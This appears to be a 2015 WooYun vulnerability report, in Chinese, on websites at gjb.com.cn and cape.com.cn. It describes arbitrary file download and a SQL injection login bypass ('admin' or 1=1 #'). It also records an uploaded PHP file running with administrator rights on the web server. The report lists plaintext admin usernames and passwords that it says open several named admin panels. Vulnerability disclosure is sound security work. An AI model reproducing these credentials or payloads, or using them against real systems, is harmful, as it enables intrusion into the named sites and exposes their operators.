漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2015-03-17: 细节已通知厂商并且等待厂商处理中
2015-03-20: 厂商已经确认,细节仅向厂商公开
2015-03-30: 细节向核心白帽子及相关领域专家公开
2015-04-09: 细节向普通白帽子公开
2015-04-19: 细节向实习白帽子公开
2015-05-04: 细节向公众公开
简要描述:
http://www.gjb.com.cn/ 任意文件下载,导致后台地址暴露,数据库账号密码泄露,多站点后台统一口令。
详细说明:
任意文件下载, 导致后台地址暴露,数据库账号密码泄露,多站点后台统一口令。
http://www.cape.com.cn/ecshop/admin/index.php
http://www.cape.com.cn/capemanage/index.php
http://cata.cape.com.cn/dede/login.php
http://zbbz.cape.com.cn:8080/
漏洞证明:
通过代码分析获得后台路径:http://www.gjb.com.cn/bzzx/index.php
程序漏洞很多,基本都没过滤参数,
万能密码:
后台直接:admin' or 1=1 #密码随意 ,登陆处理处还可以cookie伪造:
mysql root 账号在 inc/conn.php ,后台下载管理处,任意文件上传:http://www.gjb.com.cn/userfiles/201503160554info.php,
php权限很高,为
C:\Program Files (x86)\EasyPHP-5.3.5.0\www\userfiles\> whoami
gjb-webserver\administrator
后台账号:
admin1 admin
gjb gjb1
admin Cape301
chenr chenr301
wangxm wangxinmin
可以登录站点:
http://www.cape.com.cn/ecshop/admin/index.php ecshop
http://www.cape.com.cn/capemanage/index.php dedecms
http://cata.cape.com.cn/dede/login.php dedecms
http://zbbz.cape.com.cn:8080/
dede二次开发的,估计也有漏洞,没有测试,登陆后台了很好拿shell。
修复方案:
第一个站点问题太多了,各种注入,重写吧。后台密码太简单,服务器权限配置,数据库用低权限账号
版权声明:转载请注明来源 reglive@乌云
>
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:11
确认时间:2015-03-20 17:38
厂商回复:
最新状态:
暂无